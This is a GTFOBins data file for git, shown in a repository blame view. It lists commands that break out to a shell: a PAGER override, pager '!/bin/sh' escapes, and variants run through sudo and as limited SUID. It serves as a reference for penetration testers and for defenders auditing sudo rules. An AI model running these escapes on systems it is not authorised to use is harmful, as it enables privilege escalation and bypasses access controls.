GTFOBins.github.io/_gtfobins/git.md

22 lines
869 B
Markdown
Raw Normal View History

2018-07-22 15:06:54 +02:00
---
functions:
2018-10-05 19:55:38 +02:00
shell:
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
git help config
!/bin/sh
2018-10-05 19:55:38 +02:00
sudo:
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo git -p help config
!/bin/sh
2019-10-25 14:19:18 +02:00
- description: The help system can also be reached from any `git` command, e.g., `git branch`. This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo git branch --help config
!/bin/sh
2018-10-05 19:55:38 +02:00
limited-suid:
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
2018-07-22 15:06:54 +02:00
---